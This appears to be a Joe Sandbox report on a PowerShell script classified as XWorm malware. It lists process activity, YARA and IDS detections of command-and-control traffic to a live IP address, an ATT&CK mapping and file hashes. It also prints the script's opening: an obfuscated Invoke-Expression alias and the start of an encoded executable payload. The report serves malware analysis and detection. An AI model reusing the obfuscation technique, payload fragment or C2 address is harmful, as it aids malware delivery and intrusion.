            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3728" "2668" "2508" "2672" "0" "0" "2676" "0" "0" "0" "0" "0"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.0.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.0.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.0.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.0.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.0.dr | Binary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara match | File source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3728, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4364, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara match | File source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3728, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4364, type: MEMORYSTR

            MITRE ATT&CK Matrix

            Each tactic column of the report's matrix is listed top to bottom; a number before a technique is the count the report attaches to that technique (techniques without a number were not matched).

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
            Execution: 11 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Privilege Escalation: 211 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Defense Evasion: 1 Disable or Modify Tools; 231 Virtualization/Sandbox Evasion; 211 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
            Discovery: 231 Security Software Discovery; 1 Process Discovery; 231 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 23 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
            Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
            Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
92.255.57_1.112.ps1 | 18% | Virustotal | -
92.255.57_1.112.ps1 | 13% | ReversingLabs | Script.Trojan.Heuristic
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
92.255.57.112 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
15.164.165.52.in-addr.arpa | unknown | unknown | false | - | high

Name | Malicious | Antivirus Detection | Reputation
92.255.57.112 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2168812433.0000021C4B438000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2168812433.0000021C4B438000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://upx.sf.net | Amcache.hve.0.dr | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2168812433.0000021C4A061000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2168812433.0000021C4A061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
92.255.57.112 | unknown | Russian Federation | 42253 | TELSPRU | true
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1590525
                                      Start date and time:2025-01-14 08:26:32 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 57s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:92.255.57_1.112.ps1
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winPS1@6/9@1/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 12
                                      • Number of non-executed functions: 10
                                      Cookbook Comments:
                                      • Found application associated with file extension: .ps1
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.75, 13.107.246.45, 4.245.163.56, 52.165.164.15
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
Time | Type | Description
02:27:23 | API Interceptor | 27x Sleep call for process: powershell.exe modified
02:27:27 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
02:27:27 | API Interceptor | 9674011x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
92.255.57.112 | book_lumm2.dat.exe | malicious | XWorm | -
                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELSPRU | book_lumm2.dat.exe | malicious | XWorm | 92.255.57.112
TELSPRU | http://92.255.57.155/1/1.png | malicious | Unknown | 92.255.57.155
TELSPRU | 92.255.57.155.ps1 | malicious | XWorm | 92.255.57.155
TELSPRU | png2obj1_XClient.exe | malicious | XWorm | 92.255.57.155
TELSPRU | Dm35sdidf3.exe | malicious | XWorm | 92.255.57.155
TELSPRU | QP2uO3eN2p.ps1 | malicious | XWorm | 92.255.57.155
TELSPRU | WErY5oc4hl.ps1 | malicious | XWorm | 92.255.57.155
TELSPRU | NLXwvLjXPh.ps1 | malicious | XWorm | 92.255.57.155
TELSPRU | mhqxUdpe7V.ps1 | malicious | XWorm | 92.255.57.155
                                        No context
                                        No context
                                        Process:C:\Windows\System32\wermgr.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.5319159604060092
                                        Encrypted:false
                                        SSDEEP:96:JvjUF/Yj4brxYid8IRH3Uje0e35/3oo16l51QXIGZAX/d5FMT2SlPkpXmTA/f/VD:hjUFa4bmG5R30md8cAzuiF3Z24lO8D
                                        MD5:71570DD932FB049B2FB7EBCC488387F5
                                        SHA1:DB05666F22875C070B381191A0855B6F27E5DE9B
                                        SHA-256:612D28A575B2725FD405013A807AF7532AD067CFD4AA102ACF93B6655B9096CE
                                        SHA-512:71845BB8761F055EA30FBDFDF6C39DEF46FD98DB3B0F7C25AFD7200A3A628A61DFA891B103E1C8415DDA429BD1F75EED48E34B31D6E486BABD1CFE48F1FC2607
                                        Malicious:false
                                        Reputation:low
Preview:Version=1 | EventType=PowerShell | EventTime=133813132929013966 | ReportType=1 | Consent=1 | UploadTime=133813132450563367 | ReportStatus=524384 | ReportIdentifier=54e5abc7-bd2e-46d6-8d39-0df8afbbefde | Wow64Host=34404 | OriginalFilename=PowerShell.EXE | AppSessionGuid=00000e90-0001-0015-a975-dabf5566db01 | TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000f43d9bb316e30ae1a3494ac5b0624f6bea1bf054!powershell.exe | TargetAppVer=2037//06//10:07:45:25!7d6da!powershell.exe | BootId=4294967295 | Targe
                                        Process:C:\Windows\System32\wermgr.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):7284
                                        Entropy (8bit):3.7387095707741227
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJmSDa6Y2DEj0BDgmft887ZphUXVm:R6lXJLe6YZj0BDgmftZRc4
                                        MD5:3E1149EF1AD8DFF5BD95EC0B6C99F1AF
                                        SHA1:782CE759C658A86B8C802D6EF12E57F89DB7FFC7
                                        SHA-256:7912B0875413BFF504AD16C629927106C28C9357C5E880FF9073046237B8B78D
                                        SHA-512:85DDCBA6AB8DD69D9D18C04EA7C595C760DA14521CD52791AEE8E63EEA2734929DCE13685B0297857DA55BAA98F9C5B00C1FB66F3C9F581F5882AADC247AE24E
                                        Malicious:false
                                        Reputation:low
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3728</Pi
                                        Process:C:\Windows\System32\wermgr.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4905
                                        Entropy (8bit):4.685576687829041
                                        Encrypted:false
                                        SSDEEP:96:uIjfEkI76j7V8SJFKloF1cmFIWTzF1cmFHjufMd:uIvY6j7x4JuUGjufy
                                        MD5:6F5C77BFC1D3C9C3D7F99E8C1F4B0B68
                                        SHA1:52F9A60B9D80BDAF8315E79FBDD736D7DD24766C
                                        SHA-256:371129BD6F8AF2678270295DBE74B59B9DEEE3E50D24B015AF4AC753EC2F0355
                                        SHA-512:58B2C24681F83AE5F683978BD91231BD5C3C7FE21EEAC669CA6914270B3B5FCEDB4309FE514951221E9A52AD6409B07F37B8588D9F2921F21A57146691185A52
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675270" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllul/nq/llh:NllUyt
                                        MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                        SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                        SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                        SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6224
                                        Entropy (8bit):3.7211142793483583
                                        Encrypted:false
                                        SSDEEP:48:WLa1RSDdlWtMaU3CyOU2URCukvhkvklCywGhQJCSlHJ2SogZoyBQJCSlw2SogZoI:j0/N3CETdkvhkvCCt6cCSDHJcCSoHp
                                        MD5:927535DAD9F6A7509DEE532E26D6D254
                                        SHA1:278AF190BE58773A31C502135EAB9DF53FF3CDE7
                                        SHA-256:6AC5B8A707B7E1931C71828891067D1E562699D098055228EF67B7585827E3D8
                                        SHA-512:6FCE1F081BF71450C72BE3B41C69CC618B5C61233258EF3293BCB3472923D1A6DC8D7F5CC2B2B87E2D7D284844181E6E57FFD0312DC8F3611FB00A2DC7ABAD6E
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6224
                                        Entropy (8bit):3.7211142793483583
                                        Encrypted:false
                                        SSDEEP:48:WLa1RSDdlWtMaU3CyOU2URCukvhkvklCywGhQJCSlHJ2SogZoyBQJCSlw2SogZoI:j0/N3CETdkvhkvCCt6cCSDHJcCSoHp
                                        MD5:927535DAD9F6A7509DEE532E26D6D254
                                        SHA1:278AF190BE58773A31C502135EAB9DF53FF3CDE7
                                        SHA-256:6AC5B8A707B7E1931C71828891067D1E562699D098055228EF67B7585827E3D8
                                        SHA-512:6FCE1F081BF71450C72BE3B41C69CC618B5C61233258EF3293BCB3472923D1A6DC8D7F5CC2B2B87E2D7D284844181E6E57FFD0312DC8F3611FB00A2DC7ABAD6E
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.469404423457669
                                        Encrypted:false
                                        SSDEEP:6144:7zZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuN2jDH5S:3ZHtYZWOKnMM6bFpwj4
                                        MD5:58C8AA287D7ED582D88BC002F4F946DE
                                        SHA1:0027660ECDEC1B189E3C60FAC865D9D28234EA37
                                        SHA-256:914412963481C88E50DF474BE3556DE0DE79C8AEE620B31AD4E1E3DDCA0C9934
                                        SHA-512:372AD0900322049FA251101AD7DF79DE3D1DAAD3BD37DC66702111574F0894B746E2657D355236947E2671D2F5FF0AAC9C3B8E80D3407D9573EA0EA544214329
                                        Malicious:false
                                        File type:ASCII text, with very long lines (65478), with CRLF line terminators
                                        Entropy (8bit):5.1145929156583945
                                        TrID:
                                          File name:92.255.57_1.112.ps1
                                          File size:191'697 bytes
                                          MD5:d2334ba5738e776d924f60934e24874f
                                          SHA1:bb8dfe86ea75e9926de42a8acdfa4f9579681cbb
                                          SHA256:2a8290c18d10fa8a7e99575855b9fb8e734ea92b1aa7dce9840282c2657ba08c
                                          SHA512:1373a1537ca1a3fd7fe2e34ebdf30072f98beaad714353bcce168a3d9533eaf7aee7276360f5e41c29886467a591d667f7e99a543ba38b22808af32d72e92f56
                                          SSDEEP:3072:jbUdG3oRIPejlkZ17f6f8eWDPeW03uUyicETl+uHn23LUgJiQjOC3EDbVvz2NMnK:jwG3oRTjlkZ56f8eWDPeW03uUyicUl+h
                                          TLSH:3F144B321212BC8E5F7F3F44A50429A11C9C787BAB65C59CFBC909F924AA520CF78DB4
                                          File Content Preview:.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIp2gmcAAAAAAA
                                          Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-14T08:27:39.856350+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:27:40.073058+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:27:40.116270+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:27:44.937260+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:27:44.937260+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:27:51.255164+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:27:51.257204+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:02.442476+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:02.445368+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:13.635190+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:13.637235+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:14.956835+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:24.817914+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:24.820770+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:36.005064+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:36.007395+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:36.489510+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:36.491595+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:37.296156+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:37.308760+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:38.348994+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:38.351281+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:42.036211+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
